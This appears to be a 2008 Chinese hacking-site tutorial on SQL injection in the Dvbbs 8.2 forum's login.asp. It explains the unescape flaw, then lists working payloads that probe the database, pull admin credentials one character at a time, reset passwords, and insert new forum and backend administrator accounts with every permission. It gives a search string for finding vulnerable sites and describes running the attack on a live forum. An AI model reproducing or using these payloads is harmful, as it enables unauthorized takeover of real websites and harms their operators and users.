首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
教你两句话 动网8.20的后台被拿下
来源:http://hi.baidu.com/isbx/blog/ 作者:isbx 发布时间:2008-09-01  
 dvbbs8.2漏洞补下载地址:

http://bbs.dvbbs.net/dispbbs.asp?boardid=8&;Id=1519564

紧急安全补丁0530
dvbbs8.2漏洞的产生

login.asp 这个文件的97行Function Dvbbs_ChkLogin 开始有以下代码:

username=trim(Dvbbs.CheckStr(request("username")))

而passport和username是用户输入的。

Public Function Checkstr(Str)
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")
CheckStr = Replace(Str,"'","''")
End Function

动网用Checkstr进行处理。

当我们输入111',request("username")是111%27

Dvbbs.CheckStr(request("passport"))以后还是111%27
If ajaxPro Then username = unescape(username)

username就变成了111'

所以,【'】符号并没有过滤掉,漏洞就产生了。
------------------------------------------------
搜索:Powered By Dvbbs Version 8.2.0 有很多用存在这样漏洞的BBS
对于新手,分析过程比较复杂,特别是语句的组合,看了我的这个教程,基本上在一分钟之内就可以搞定.
admin' and '1'='1 用户名或者密码不正确.
admin' and '1'='2 本论坛不存在该用户名.
判断数据库类型:
;and (select count(*) from sysobjects)>0
;and (select count(*) from msysobjects)>0

admin' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1

admin' and 1=(select count(*) from dv_admin where left(password,1)='a') and '1'='1

' and (select @@version)>0--

' and (select is_srvrolemember('sysadmin'))>0--
' and (select IS_MEMBER('db_owner'))>0--

49ba59abbe56e057=123456
';update dv_user set password='49ba59abbe56e057' where username='sishui'--

';update dv_user set usergroupid=1 where username='sishui'--

bugtest';insert into dv_user (username,userpassword,usergroupid) values('sishui','49ba59abbe56e057','1')--

bugtest';insert into dv_admin (username,password,flag,adduser) values('sishui','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','sishui')--

为了省时间我就直接先找了个论坛测试,大家看操作就好,我们来到登陆页面,这句话的意思就是在这个论坛里加入一个管理拥护, 我拥护名为sishui 密码为123456 密码是加密的, 我们来看看 下面的密码随便输入 ,这个意思就是代表成功了,我们来登陆看看,看见了吧, 呵呵, 我们在来进后台不成功, 为什么呢, 应为刚刚我加入的是论坛管理, 没有提到后台管理,下面我们在来用代码,提到后台管理权限,我们来看代码 意思就是把他的权限全部提升到45 ,我们来试试,好了,我们在登陆看,我们进来了,呵呵,。 好了就这样,教程结束


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·dfcms后台拿webshell,只谈思路
·拿下DVBBS php官网
·从CSDN 漏洞谈.NET 安全开发
·渗透某知名游戏代理商内网全程
·提權整理貼
·hzhost虚拟主机系统致命漏洞
·饶过Xplog70.dll玩入侵
·又一个猥琐的技巧:Surf Jacking
·经过中国黑客鉴定,中国乳业网站
·通过mysql对淮北生活通网站的一
·跨站脚本漏洞导致的浏览器劫持攻
·OmniPeek抓包的一点看法
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved